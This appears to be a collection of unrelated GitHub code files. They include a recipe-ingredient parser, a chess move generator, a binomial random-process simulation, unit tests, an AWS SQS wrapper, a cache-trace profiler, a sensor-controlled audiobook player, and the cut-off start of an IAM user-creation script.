\"⅔\": \"2/3\",\n \"½\": \"1/2\",\n \"™\": \"\",\n \"®\": \"\",\n \"©\": \"\",\n \"…\": \"\",\n \"’\": \"'\",\n \"‘\": \"'\",\n \"”\": '\"',\n \"“\": '\"',\n \"à\": \"a\",\n \"â\": \"a\",\n \"É\": \"E\",\n \"è\": \"e\",\n \"é\": \"e\",\n \"ñ\": \"n\",\n \"ú\": \"u\",\n }\n\n for f_unicode, f_ascii in unicode_map.items():\n s = s.replace(f_unicode, \" \" + f_ascii)\n\n return s\n\n\n# write an empty file\nf = open(\"input.txt\", \"w\")\nf.close()\n\n# recipes = recipes[:10000]\n\nbar = Bar(\"Writing input file\", max=91465)\nfor i, recipe in enumerate(recipes):\n bar.next()\n with open(\"input.txt\", \"a\") as f:\n recipe[\"ingredients\"] = [\n cleanUnicode(ingredient) for ingredient in recipe[\"ingredients\"]\n ]\n f.write(\"\\n\".join(recipe[\"ingredients\"]) + \"\\n\")\nbar.finish()\n\nprint(\"Parsing input file.\")\ncommand = subprocess.run(\n [\n \"docker\",\n \"run\",\n \"--mount\",\n \"type=bind,source=/home/wedmisten/foodFinder/input.txt,target=/input/input.txt,readonly\",\n \"wedmisten/ingredients-tagger\",\n ],\n capture_output=True,\n)\n\nprint(\"Loading parsed output.\")\ningredients = command.stdout\nparsed = json.loads(ingredients)\n\nbar = Bar(\"Removing HTML Tags\", max=222034267)\n# remove random HTML data\nfor ingedient in parsed:\n bar.next()\n del ingedient[\"display\"]\nbar.finish()\n\nbar = Bar(\"Writing enriched recipes\", max=91465)\nparsed_idx = 0\nfor i, recipe in enumerate(recipes):\n bar.next()\n recipe[\"parsed_ingredients\"] = []\n for _ in range(len(recipe[\"ingredients\"])):\n recipe[\"parsed_ingredients\"].append(parsed[parsed_idx])\n parsed_idx += 1\n\nbar.finish()\n\nprint(\"Writing enriched data\")\nwith open(\"enriched_recipes.json\", \"w\") as f:\n json.dump(recipes, f, indent=2)\n","repo_name":"wcedmisten/foodFinder","sub_path":"test-scraper.py","file_name":"test-scraper.py","file_ext":"py","file_size_in_byte":2744,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"51"} +{"seq_id":"39805695831","text":"\"\"\"\nAceasta clasa este responsabila sa stocheze toate informatiile actuala ale jocului de sah si sa o sa se ocupe de mutarile valide si va pastralog-ul de mutari\n\"\"\"\n\nclass GameState():\n def __init__(self):\n # tabla de sah este o lista 8X8 2d si fiecare element din lista are 2 caractere\n #primul caracter reprezinta culoarea piese, 'b' sau ' white'\n #cel de-al doilea reprezinta tipul piese care poate fi 'k'=King, 'Q'=Queen, 'R'=Rook, 'B'=Bishop, 'N'=Knight sau 'P'=Pawn\n # '--'= spatiu liber fara piese\n self.board = [\n [\"bR\", \"bN\", \"bB\", \"bQ\", \"bK\", \"bB\", \"bN\", \"bR\"],\n [\"bp\", \"bp\", \"bp\", \"bp\", \"bp\", \"bp\", \"bp\", \"bp\"],\n [\"--\", \"--\", \"--\", \"--\", \"--\", \"--\", \"--\", \"--\"],\n [\"--\", \"--\", \"--\", \"--\", \"--\", \"--\", \"--\", \"--\"],\n [\"--\", \"--\", \"wR\", \"--\", \"--\", \"bK\", \"--\", \"--\"],\n [\"--\", \"--\", \"--\", \"--\", \"--\", \"--\", \"--\", \"--\"],\n [\"wp\", \"wp\", \"wp\", \"wp\", \"wp\", \"wp\", \"wp\", \"wp\"],\n [\"wR\", \"wN\", \"wB\", \"wQ\", \"wK\", \"wB\", \"wN\", \"wR\"],\n ]\n self.moveFunctions = {'p': self.getPawnMoves, 'R': self.getRookMoves, 'N': self.getKnightMoves,\n 'B': self.getBishopMoves, 'Q': self.getQueenMoves, 'K': self.getKingMoves}\n\n self.whiteToMove = True\n self.moveLog = []\n\n\n #Preia o mutare ca parametru si o executa ( nu va function pentru castling, pown promotion, si en-passant(capturarea pionului))\n def makeMove(self, move):\n self.board[move.startRow][move.startCol] = \"--\" #dupa ce mutam 
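`cleanUnicode` above walks the whole string once per map entry via `str.replace`; `str.maketrans` accepts a dict mapping characters to replacement strings, so the same table can be applied in a single pass. A sketch with a subset of the record's table (it keeps the leading space the original prepends to fractions):

```python
# One-pass variant of the record's cleanUnicode using str.translate.
UNICODE_MAP = {
    "⅛": " 1/8", "¼": " 1/4", "⅓": " 1/3", "½": " 1/2",
    "™": "", "’": "'", "“": '"', "é": "e",
}
_TABLE = str.maketrans(UNICODE_MAP)

def clean_unicode(s: str) -> str:
    return s.translate(_TABLE)

assert clean_unicode("¼ cup") == " 1/4 cup"
```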
piesa lasa spatiul gol\n self.board[move.endRow][move.endCol] = move.pieceMoved\n self.moveLog.append(move) #inregistram mutarea ca sa o putem modifica ulterior daca este necesar\n self.whiteToMove = not self.whiteToMove #schimbam turele playerilor\n\n\n def undoMove(self):\n if len(self.moveLog) != 0: # ne asiguram ca este o mutare care putem face undo la ea\n move = self.moveLog.pop()\n self.board[move.startRow][move.startCol] = move.pieceMoved\n self.board[move.endRow][move.endCol] = move.pieceCaptured\n self.whiteToMove = not self.whiteToMove #facem schimb de tura inapoi\n\n '''\n Toate mutarile considerate valide\n '''\n def getValidMoves(self):\n return self.getAllPossibleMoves()\n\n '''\n Toate mutarile fara validare\n '''\n def getAllPossibleMoves(self):\n moves = []\n for r in range(len(self.board)): #numarul de randuri\n for c in range(len(self.board[r])): #numarul de coloane in randurile date\n turn = self.board[r][c][0]\n if (turn == 'w' and self.whiteToMove) or (turn == 'b' and not self.whiteToMove):\n piece = self.board[r][c][1]\n self.moveFunctions [piece](r, c, moves) #apeleaza corect functia move in baza tipului piesei\n return moves\n\n\n\n\n '''\n Preia toate mutarile pionul localizat in randul si coloana respectiva si creeaza mutari in lista\n '''\n def getPawnMoves(self, r, c, moves):\n if self.whiteToMove: #mutarea pionilor albi\n if self.board[r-1][c] == \"--\": #mutare de un patrat a pionului\n moves.append(Move((r, c) , (r-1, c), self.board))\n if r == 6 and self.board[r-2][c] ==\"--\": # 2 patrate mutare pion\n moves.append(Move((r, c), (r-2, c), self.board))\n if c-1 >= 0:\n if self.board[r-1][c-1][0] == 'b': #este o piesa inima de capturat\n moves.append(Move((r, c), (r - 1 , c - 1), self.board))\n if c+1 <= 7: #captureaza piesa inamica la dreapta\n if self.board[r-1][c+1][0] == 'b': # piesa inamica de capturat\n moves.append(Move((r, c),(r-1, c+1), self.board))\n\n else: #pionul negru mutari\n if self.board[r + 1][c] == \"--\": # mutare 1 patrat\n moves.append(Move((r,c), (r + 1, c), self.board))\n if r == 1 and self.board[r+2][c] == \"--\": #2 square moves\n moves.append(Move((r,c), (r + 2, c), self.board))\n # captures\n if c - 1 >= 0: #captura la stanga\n if self.board[r + 1][c - 1][0] == 'w':\n moves.append(Move((r, c), (r + 1, c - 1), self.board))\n if c + 1 <=7: #captura la dreapta\n if self.board[r+1][c+1][0] == 'w':\n moves.append(Move((r, c), (r + 1, c + 1), self.board))\n\n '''\n Preia toate mutarile turei localizat in randul si coloana respectiva si creeaza mutari in lista\n '''\n def getRookMoves(self, r, c, moves):\n directions = ((-1, 0), (0, -1), (1,0), (0, 1)) # sus, stanga, jos , dreapta\n enemyColor = \"b\" if self.whiteToMove else \"w\"\n for d in directions:\n for i in range(1, 8):\n endRow = r + d[0] * i\n endCol = c + d[1] * i\n if 0 <= endRow < 8 and 0 <= endCol < 8: #pe tabla\n endPiece = self.board[endRow][endCol]\n if endPiece == \"--\": #spatiu gol valid\n moves.append(Move((r, c), (endRow, endCol), self.board))\n elif endPiece[0] == enemyColor: # enemy piece valid\n moves.append(Move((r, c), (endRow, endCol), self.board))\n break\n else: # piesa proprie rezulta invalid\n break\n else : # inafara tablei de joc\n break\n\n\n '''\n Preia toate mutarile turei localizat in randul si coloana respectiva si creeaza mutari in lista\n '''\n def getKnightMoves(self, r, c, moves):\n knightMoves = ((-2, -1), (-2, 1), (-1, -2), (-1, 2), (1, -2), (1, 2), (2, -1), (2, 1))\n allyColor = \"w\" if self.whiteToMove else \"b\"\n for m in knightMoves:\n 
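The knight and king generators in this engine share one shape (fixed offsets plus a bounds check) while rook and bishop share another (a ray walk per direction, which `getQueenMoves` simply combines); note also that the record's `kingMoves` tuple lists `(-1, 1)` twice and omits `(-1, -1)`. A condensed standalone sketch of both patterns, with `board` as the record's 8x8 list of 2-char strings:

```python
# Condensed sketch of the two generator shapes used above (standalone).
# `board` follows the record: 8x8 list of 2-char strings, "--" is empty.
def offset_moves(board, r, c, offsets, ally):
    """Knight/king style: at most one step per fixed offset."""
    for dr, dc in offsets:
        nr, nc = r + dr, c + dc
        if 0 <= nr < 8 and 0 <= nc < 8 and board[nr][nc][0] != ally:
            yield nr, nc

def ray_moves(board, r, c, directions, ally):
    """Rook/bishop style: walk each direction until blocked."""
    for dr, dc in directions:
        nr, nc = r + dr, c + dc
        while 0 <= nr < 8 and 0 <= nc < 8:
            if board[nr][nc] == "--":
                yield nr, nc
            else:
                if board[nr][nc][0] != ally:
                    yield nr, nc  # capture square, then stop
                break
            nr, nc = nr + dr, nc + dc

board = [["--"] * 8 for _ in range(8)]
print(list(offset_moves(board, 0, 0, [(-2, -1), (2, 1), (1, 2)], "w")))  # [(2, 1), (1, 2)]
```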
endRow = r + m[0]\n endCol = c + m[1]\n if 0 <= endRow < 8 and 0 <= endCol <8:\n endPiece = self.board[endRow][endCol]\n if endPiece[0] != allyColor: #nnu este piesa aliata (spatiu gol sau piesa inamica)\n moves.append(Move((r, c), (endRow, endCol), self.board))\n\n\n '''\n Preia toate mutarile nebunului localizat in randul si coloana respectiva si creeaza mutari in lista\n '''\n def getBishopMoves(self, r, c, moves):\n directions = ((-1, -1), (-1, 1), (1, -1), (1, 1)) #diagonale\n enemyColor = \"b\" if self.whiteToMove else \"w\"\n for d in directions:\n for i in range(1, 8): #nebunul poate traversa doar 7 casute\n endRow = r + d[0] * i\n endCol = c + d[1] * i\n if 0 <= endRow < 8 and 0 <= endCol < 8: #daca este pe tabla\n endPiece = self.board[endRow][endCol]\n if endPiece == \"--\" : #spatiu gol valid\n moves.append(Move((r, c), (endRow, endCol), self.board))\n elif endPiece[0] == enemyColor: #enemy piece valid\n moves.append(Move((r, c), (endRow, endCol), self.board))\n break\n else: #friendly piece invalid\n break\n else: # off board\n break\n\n '''\n Preia toate mutarile reginei localizat in randul si coloana respectiva si creeaza mutari in lista\n '''\n def getQueenMoves(self, r, c, moves):\n self.getRookMoves(r, c, moves)\n self.getBishopMoves(r, c, moves)\n\n '''\n Preia toate mutarile regelui localizat in randul si coloana respectiva si creeaza mutari in lista\n '''\n def getKingMoves(self, r, c, moves):\n kingMoves = ((-1, 1), (-1, 0), (-1, 1), (0, -1), (0, 1 ), (1, -1), (1, 0), (1, 1))\n allyColor = \"w\" if self.whiteToMove else \"b\"\n for i in range(8):\n endRow = r + kingMoves[i][0]\n endCol = c + kingMoves[i][1]\n if 0 <= endRow < 8 and 0 <= endCol < 8:\n endPiece = self.board[endRow][endCol]\n if endPiece[0] != allyColor: #nu este o piesa aliata( spatiu gol sau piesa inamica)\n moves.append(Move((r, c), (endRow, endCol), self.board))\n\nclass Move():\n # maps key to values\n # key : value\n #Creeam notarea in sah a tablei\n ranksToRows = {\"1\": 7, \"2\": 6, \"3\": 5, \"4\": 4,\n \"5\": 3, \"6\": 2, \"7\": 1, \"8\":0}\n rowsToRanks = {v: k for k, v in ranksToRows.items()}\n filesToCols = {\"a\":0, \"b\":1, \"c\":2, \"d\": 3,\n \"e\": 4, \"f\": 5, \"g\": 6, \"h\": 7}\n colsToFiles = {v: k for k, v in filesToCols.items()}\n\n def __init__(self, startSq, endSq, board):\n self.startRow = startSq[0]\n self.startCol = startSq[1]\n self.endRow = endSq[0]\n self.endCol = endSq[1]\n self.pieceMoved = board[self.startRow][self.startCol]\n self.pieceCaptured = board[self.endRow][self.endCol]\n self.moveID = self.startRow * 1000 + self.startCol * 100 + self.endRow *10 + self.endCol\n\n\n '''\n Overriding metodele =\n '''\n def __eq__(self, other):\n if isinstance(other, Move):\n return self.moveID == other.moveID\n return False\n\n\n def getChessNotation(self):\n return self.getRankFile(self.startRow, self.startCol) + self.getRankFile(self.endRow, self.endCol)\n\n def getRankFile(self, r, c):\n return self.colsToFiles[c] + self.rowsToRanks[r]\n\n","repo_name":"tarbatoma/ChessPhyton","sub_path":"Chess/ChessEngine.py","file_name":"ChessEngine.py","file_ext":"py","file_size_in_byte":9463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"43123875394","text":"import matplotlib.pyplot as plt #Importando a biblioteca para a plotagem do gráfico\r\nimport numpy as np #Biblioteca para as funções\r\nr = 200 #Etapas = n\r\nu = 50 # Número de realizações\r\ns = np.zeros((r, u)) #Vetor com 2 atributos, onde r número de etapas e u = 50 
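The binomial-process script beginning here grows each realization with a per-step Python loop; since the increments are i.i.d. Bernoulli(p) draws, the whole steps-by-realizations matrix can be drawn at once and cumulatively summed. A vectorized sketch (my own, not the author's code):

```python
import numpy as np

def binomial_process(n_steps: int, n_paths: int, p: float, seed: int = 0) -> np.ndarray:
    """S_n = sum of n i.i.d. Bernoulli(p) increments, one column per realization."""
    rng = np.random.default_rng(seed)
    increments = rng.random((n_steps, n_paths)) < p   # Bernoulli(p) as booleans
    return np.cumsum(increments, axis=0)              # running count of successes

s = binomial_process(200, 50, p=0.75)
print(s.shape, s[-1].mean())  # (200, 50); mean of S_200 close to 200 * 0.75 = 150
```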
realizações inicializando no zero\r\np= 0.75 #probabilidade\r\nn = 2\r\n# onde sample é o número de amostras\r\nfor sample in range(u): #u = 50 Comparando quais valores aleatórios são menores que p\r\n if (np.random.uniform(0, 1) < p):\r\n s[1, sample] = 1 #guardando os valores no vetor s\r\n for n in range(1, r): # de n = até r= 200 alimentar os vetores com os processos aleatórios\r\n\t s[n,sample]= s[n-1,sample] #pega o vetor com o valor atual n =2 e recebe o valor anterior para a comparação\r\n\t if (np.random.uniform(0,1) < p): # Se o valor aleatório tiver com o parâmetro menor que a probabilidade\r\n\t\t s[n,sample] = s[n-1,sample]+1 #Logo o próximo processo vai ser somado + 1 e vai contruindo o processo aleatório\r\n# Sempre comparando o atual com o anterior e guarda o próximo, assim sucessivamente\r\n\r\n#########################################################################################################################\r\n#Agora para plotar outra distribuição com os mesmos parâmetros e probabilidade k = 0.4\r\n\r\nk = 0.5\r\nv = np.zeros((r, u)) ##Vetor com 2 atributos, onde r = 200 é o número de tentativas e u = 50 realizações inicializando no zero\r\nfor sample in range(u): #Comparando quais valores aleatórios são menores que k\r\n if (np.random.uniform(0, 1) < k):\r\n v[1, sample] = 1 #guardando os valores no vetor v\r\n for n in range(1, r): # de n = até r= 200 alimentar os vetores com os processos aleatórios\r\n\t v[n,sample]= v[n-1,sample] #pega o vetor com o valor atual n =2 e recebe o valor anterior para a comparação\r\n\t if (np.random.uniform(0 ,1) < k): # Se o valor aleatório tiver com o parâmetro menor que a probabilidade\r\n\t\t v[n,sample] = v[n-1,sample]+1 #Logo o próximo processo vai ser somado + 1 e vai contruindo o processo aleatório\r\n\r\nplt.plot(s[:, sample], 'r-', label = \"prob %s\" %str(p)) #Plotando a figura com o processo bonomial aleatório\r\nplt.plot(v[:, sample], 'g-', label = \"prob %s\" %str(k)) #Plotando a figura com o processo bonomial aleatório\r\nplt.legend('')\r\nplt.title(f'Processo aleatório binomial') #Título\r\nplt.xlabel('N') #Eixo x\r\nplt.ylabel('Sn') #Eixo y\r\nplt.legend(loc=2) #Localização da legenda\r\nplt.grid(True)\r\nplt.show()","repo_name":"augustocarrlos10/Processos-aleat-rios","sub_path":"Binomial_Process.py","file_name":"Binomial_Process.py","file_ext":"py","file_size_in_byte":2559,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"25234210625","text":"from desword.lib import FileHandler\nimport os\n\n\ndef test_file_cleaned(path_data):\n internal_directory = os.path.join(path_data.output, 'depth')\n os.mkdir(internal_directory)\n with open(os.path.join(internal_directory, \"example.md\"), \"w\") as f:\n f.write('
\n    Hallo\n
    ')\n assert os.listdir(internal_directory) == ['example.md']\n f = FileHandler(path_data)\n f.empty_output()\n assert os.listdir(path_data.output) == []\n\n\ndef test_file_graph_built(path_data):\n internal_directory = os.path.join(path_data.input, 'depth')\n os.mkdir(internal_directory)\n with open(os.path.join(internal_directory, \"example.md\"), \"w\") as f:\n f.write('# Hallo')\n f = FileHandler(path_data)\n f.empty_output()\n f.generate_file_graph()\n assert f.file_graph['depth/example']['lines'] == '# Hallo'\n","repo_name":"tomlockwood/desword","sub_path":"tests/unit_tests/test_file_handler.py","file_name":"test_file_handler.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"15613780777","text":"from boto3.session import Session\n\n\nclass SQS:\n def __init__(self, config):\n self.session = Session(aws_access_key_id=config['ACCESS_KEY'],\n aws_secret_access_key=config['SECRET_ACCESS_KEY'],\n region_name=config['REGION'])\n\n self.sqs = self.session.resource('sqs')\n self.queue = self.sqs.get_queue_by_name(QueueName=config['PRIORITY_QUEUE'])\n\n def set_queue(self, s_name):\n self.queue = self.sqs.get_queue_by_name(QueueName=s_name)\n\n return True\n\n def send_message(self, s_body, d_attributes):\n response = self.queue.send_message(MessageBody=s_body,\n MessageAttributes=d_attributes)\n\n return response\n\n def receive_message(self, l_attr_names, l_message_attr_names,\n i_max_number_of_messages,\n i_visibility_timeout,\n i_waittimeseconds):\n\n message = self.queue.receive_messages(\n l_attr_names,\n l_message_attr_names,\n i_max_number_of_messages,\n i_visibility_timeout,\n i_waittimeseconds)\n\n return message\n","repo_name":"eshleebien/falcon-boilerplate","sub_path":"util/sqs.py","file_name":"sqs.py","file_ext":"py","file_size_in_byte":1223,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"51"} +{"seq_id":"5354615783","text":"import json \nimport numpy as np \nimport pandas as pd \nfrom cydonia.profiler.RDHistogram import RDHistogram\n\nclass BlockAccessTraceProfiler:\n def __init__(\n self, \n block_access_trace_path: str \n ) -> None:\n self.df = pd.read_csv(block_access_trace_path, names=[\"ts\", \"id\", \"op\", \"rd\"])\n self.start_time_us = self.df.iloc[0][\"ts\"]\n self.end_time_us = self.df.iloc[-1][\"ts\"]\n self.trace_length_us = self.end_time_us - self.start_time_us \n self.rd_hist_snapshot_window_size_sec = 3600 * 24\n self.id_set = set()\n self.rd_hist = RDHistogram()\n print(\"Block trace loaded!\")\n \n\n def get_stat(self, index, wss_blocks):\n max_read_hit_rate = 0.0 \n output_stat = {}\n output_stat['index'] = index\n output_stat['wss_gb'] = (wss_blocks * 4096)/1e9\n for percent_working_set_size in range(10, 101, 10):\n cache_size = (percent_working_set_size/100)*wss_blocks\n max_read_hit_rate, read_hit_rate = self.rd_hist.get_read_hit_rate(int(cache_size))\n output_stat['hr_{}'.format(percent_working_set_size)] = read_hit_rate\n output_stat['size_{}'.format(percent_working_set_size)] = int(cache_size)\n output_stat[\"max_read_hit_rate\"] = max_read_hit_rate\n return output_stat\n\n \n def profile(self, output_path = None):\n active_window_index = 0\n window_stat_arr = []\n for row_index, row in self.df.iterrows():\n self.rd_hist.update_rd(row[\"rd\"], row[\"op\"])\n self.id_set.add(row[\"id\"])\n\n cur_time_us = row[\"ts\"]\n time_elapsed_us = (cur_time_us - self.start_time_us)/(1e6*3600)\n cur_window_index = 
int((cur_time_us - self.start_time_us)//(1e6*self.rd_hist_snapshot_window_size_sec))\n if row_index % 10000000 == 0 and row_index > 0:\n print(\"{}/{} processed! {}%\".format(row_index, len(self.df), 100*row_index/len(self.df)))\n\n if cur_window_index != active_window_index:\n # window changed so collect stats\n output_stat = self.get_stat(active_window_index, len(self.id_set))\n output_stat['time_elapsed_us'] = time_elapsed_us\n print(json.dumps(output_stat))\n window_stat_arr.append(output_stat)\n active_window_index = cur_window_index\n else:\n output_stat = self.get_stat(active_window_index, len(self.id_set)) \n output_stat['time_elapsed_us'] = time_elapsed_us\n print(json.dumps(output_stat))\n window_stat_arr.append(output_stat)\n active_window_index = cur_window_index\n \n\n if output_path is not None:\n with open(output_path, \"w+\") as f:\n json.dump(window_stat_arr, f, indent=4)\n ","repo_name":"pbhandar2/phdthesis","sub_path":"cydonia/cydonia/profiler/BlockAccessTraceProfiler.py","file_name":"BlockAccessTraceProfiler.py","file_ext":"py","file_size_in_byte":2832,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"10649910330","text":"\nimport platform\nimport pygame\nfrom pygame.locals import *\nimport psycopg2\nimport time\nimport keyboard\nimport pyttsx3\n\nDirectory = \"\"\n\n# name = ['Rotkaeppchen', 'Rapunzel', 'Froschkoenig', 'Aschenputtel', 'Gestiefelter_Kater', 'Bremer_Stadtmusikanten', 'Haensel_und_Gretel', 'Goldene_Gans', 'Wilhelm_Tell']\nname = []\nautor = []\ngenre = []\npausiert = []\npygame.mixer.init()\nFilesPlayed = 0\n#conn1 = psycopg2.connect(\"dbname=paul user=Vinc password=Vinc\")\nengine = pyttsx3.init()\n\n\n\n\nclass Buecher(object):\n\n if (platform.system() == 'Windows'):\n deutsch = \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Speech\\Voices\\Tokens\\eSpeak_3\"\n engine.setProperty('rate', 100)\n\n Directory = \"D:/Diplomarbeit/Github/Kuscheltier/Teddy/books/Brueder_Grimm/\"\n else:\n deutsch = \"german\"\n engine.setProperty('rate', 140)\n Directory = \"/books/Brueder_Grimm/\"\n\n engine.setProperty('voice', deutsch)\n\n\n\n# Hier werden die Variablen aus dem Parameter der Klasse initialisiert\n def __init__(self, conn, sensorwerte):\n self.conn = conn\n self.sensorwerte = sensorwerte\n\n def selectBuch(self,conn):\n \n print(self.sensorwerte.rHand)\n \n cur1 = conn.cursor()\n cur2 = conn.cursor()\n cur3 = conn.cursor()\n cur4 = conn.cursor()\n\n SQLName = 'SELECT name FROM Buch WHERE ausgewaehlt = TRUE'\n SQLAutor = 'SELECT autor FROM Buch WHERE ausgewaehlt = TRUE'\n SQLGenre = 'SELECT genre FROM Buch WHERE ausgewaehlt = TRUE'\n SQLPausiert = 'SELECT pausiert FROM Buch WHERE ausgewaehlt = TRUE'\n\n cur1.execute(SQLName, )\n cur2.execute(SQLAutor, )\n cur3.execute(SQLGenre, )\n cur4.execute(SQLPausiert, )\n\n if (\n cur1.rowcount != cur2.rowcount or cur1.rowcount != cur3.rowcount or cur1.rowcount != cur4.rowcount or cur2.rowcount != cur3.rowcount or cur2.rowcount != cur4.rowcount or cur3.rowcount != cur4.rowcount):\n cur1.execute(SQLName, )\n cur2.execute(SQLAutor, )\n cur3.execute(SQLGenre, )\n cur4.execute(SQLPausiert, )\n\n row1 = cur1.fetchall()\n row2 = cur2.fetchall()\n row3 = cur3.fetchall()\n row4 = cur4.fetchall()\n\n for row in row1:\n name.append(row[0])\n for row in row2:\n autor.append(row[0])\n for row in row3:\n genre.append(row[0])\n for row in row4:\n pausiert.append(row[0])\n\n cur1.close()\n cur2.close()\n cur3.close()\n cur4.close()\n\n def stopLesen(self):\n 
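A caution on the `SQS.receive_message` wrapper a few records up: it forwards its five arguments positionally, but boto3 resource actions such as `Queue.receive_messages` accept keyword arguments only and raise a `TypeError` otherwise. A corrected sketch of the call (queue name and values are placeholders):

```python
import boto3

# Boto3 resource actions are keyword-only; positional args raise TypeError.
sqs = boto3.resource("sqs")
queue = sqs.get_queue_by_name(QueueName="my-priority-queue")  # placeholder name

messages = queue.receive_messages(
    AttributeNames=["All"],
    MessageAttributeNames=["All"],
    MaxNumberOfMessages=10,   # 1-10
    VisibilityTimeout=30,     # seconds the message stays hidden from other consumers
    WaitTimeSeconds=20,       # long polling, up to 20 s
)
for msg in messages:
    msg.delete()  # acknowledge only after successful processing
```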
pygame.mixer.music.pause()\n\n def startLesenAgain(self):\n pygame.mixer.music.unpause()\n\n\n def getVolume(self):\n #print(pygame.mixer.music.get_volume())\n return pygame.mixer.music.get_volume()\n\n def volumeUp(self):\n pygame.mixer.music.set_volume(self.getVolume()+0.1)\n\n def volumeDown(self):\n pygame.mixer.music.set_volume(self.getVolume()-0.1)\n\n\n def busy(self,conn,index):\n print(\"in busy\")\n cur1 = conn.cursor()\n SQL_UPDATE_Time = 'UPDATE Buch SET pausiert = (%s) WHERE name = (%s)'\n start_time = time.time()\n elapsed_time = 0\n pause = False\n warSchonPause = False\n global elapsed_pause_time\n elapsed_pause_time = 0\n global pause_start\n global pause_end\n\n zeitSeitLetztemSignal = 1\n beginnZeitSeitLetztemSignal = 0\n while pygame.mixer.music.get_busy() == True:\n\n #KeyboardSignalZeit\n\n print(\"Zeit der Pausen: \"+str(elapsed_pause_time))\n\n print(start_time)\n if pause == False and warSchonPause == False:\n elapsed_time = time.time() - start_time # + pausiert[0]\n if pause == False and warSchonPause == True:\n elapsed_time = time.time() - start_time - elapsed_pause_time\n\n zeitSeitLetztemSignal = time.time() - beginnZeitSeitLetztemSignal\n\n print(elapsed_time)\n if zeitSeitLetztemSignal>=1:\n try: # used try so that if user pressed other than the given key error will not be shown\n if self.sensorwerte.rFuss == False:\n print(self.getVolume())\n print('Lauter')\n self.volumeUp()\n print(self.getVolume())\n beginnZeitSeitLetztemSignal = time.time()\n elif self.sensorwerte.lFuss == False:\n print(self.getVolume())\n print('Leiser')\n self.volumeDown()\n print(self.getVolume())\n beginnZeitSeitLetztemSignal = time.time()\n elif self.sensorwerte.rHand == False:\n print('Pause')\n pause_start = time.time()\n pause = True\n self.stopLesen()\n beginnZeitSeitLetztemSignal = time.time()\n elif self.sensorwerte.lHand == False:\n print(\"Lese wieder\")\n elapsed_pause_time = elapsed_pause_time + time.time() - pause_start\n print(\"Elapsed Pause Time nach unpause: \"+str(elapsed_pause_time))\n pause = False\n warSchonPause = True\n self.startLesenAgain()\n beginnZeitSeitLetztemSignal = time.time()\n elif self.sensorwerte.abbr == False:\n print('Escape')\n pause_start = time.time()\n pause = True\n self.stopLesen()\n beginnZeitSeitLetztemSignal = time.time()\n\n print(pausiert[index])\n pausiert[index] = elapsed_time + pausiert[index]\n print(pausiert[index])\n data = (pausiert[index], name[index],)\n cur1.execute(SQL_UPDATE_Time, data)\n conn.commit()\n break\n\n else:\n pass\n except:\n pass # if user pressed a key other than the given key the loop will break\n #schonGesendet=True\n #continue\n print(pausiert[index])\n pausiert[index] = elapsed_time + pausiert[index]\n print(pausiert[index])\n data = (pausiert[index], name[index],)\n cur1.execute(SQL_UPDATE_Time, data)\n conn.commit()\n\n def playSong(self,index):\n #pygame.mixer.music.load(Directory+name[index]+\".mp3\")\n #pygame.mixer.music.play(1,pausiert[index])\n #busy()\n #pygame.mixer.music.load(Directory + name[index+1] + \".mp3\")\n #pygame.mixer.music.play(1, pausiert[index+1])\n #busy()\n print(name)\n\n #skip = False\n\n for x in range(index,len(name)):\n\n for y in range(1):\n engine.say(\"Wollen sie das Hörbuch\" + str(name[x]) + \"hören?\")\n engine.runAndWait()\n\n time5 = time.time()+5\n while time.time() len(data)-1\n assert c_data.index[0] == 0\n assert c_data.index[-1] == len(c_data)-1\n\n\ndef test_get_model_input(context, dummy_data):\n X, y, _ = get_model_input(\n data=dummy_data,\n 
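`volumeUp`/`volumeDown` in the audiobook class above add ±0.1 to `pygame.mixer.music.get_volume()` with no bounds check; clamping explicitly keeps the arithmetic inside the documented [0.0, 1.0] range rather than relying on the library's behavior at the edges. A small sketch (assumes the mixer is already initialized):

```python
import pygame

pygame.mixer.init()

def change_volume(delta: float) -> float:
    """Nudge music volume by delta, clamped to the documented [0.0, 1.0] range."""
    volume = max(0.0, min(1.0, pygame.mixer.music.get_volume() + delta))
    pygame.mixer.music.set_volume(volume)
    return volume

change_volume(+0.1)  # louder
change_volume(-0.1)  # quieter
```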
winner_col=context.params['winner_col'],\n loser_col=context.params['loser_col'],\n keep_cols=[context.params['date_col']])\n\n # output index should be same as input index\n assert list(X.index) == list(y.index) == list(dummy_data.index)\n\n # X and y same length\n assert len(X) == len(y) == len(dummy_data)\n\n # 1 for player_1 should be offset by -1 for player_2, ignoring date col\n assert all(X.drop(columns=context.params['date_col']).sum(axis=1)) == 0\n\n # player names should be column names\n assert all(dummy_data[context.params['winner_col']].isin(X.columns))\n assert all(dummy_data[context.params['loser_col']].isin(X.columns))\n\n # y should be all 1's\n assert y.sum() == len(y)\n\n\ndef test_get_starting_abilities(context, dummy_data):\n abilites = get_starting_abilities(\n players=[\"Tom\", \"Harry\"],\n data=dummy_data,\n winner_col=context.params['winner_col'],\n winner_pts=context.params['winner_pts'],\n loser_col=context.params['loser_col'],\n loser_pts=context.params['loser_pts'])\n\n np.testing.assert_array_equal(abilites, np.array([100, 10]))\n assert abilites.dtype is np.dtype(float)\n","repo_name":"gtynan/research_papers","sub_path":"high_dim_bt/src/tests/test_nodes/test_data_engineering.py","file_name":"test_data_engineering.py","file_ext":"py","file_size_in_byte":2505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"41204581906","text":"import boto3\nfrom parameters import putParameter\nimport properties\n\n\n\n\nAccount_ID = boto3.client('sts').get_caller_identity()['Account'] \nmy_session = boto3.session.Session()\nRegion = my_session.region_name\n\n## Figure out some parameters used throughout the application\n\nputParameter('Account_ID', Account_ID, 'True')\nputParameter('Region', Region, 'True')\n\n\n## List of IAM users to create\n## This will create user, assign associated policy, create a secret/key\n## List of users is in properties.py file\n\ndef addIAMusers():\n for id, info in properties.iamUsers.items():\n \n print(\"\\nUser_ID:\", id, info)\n\n client = boto3.client('iam')\n \n client.create_user(\n UserName = properties.iamUsers[id]['name'],\n 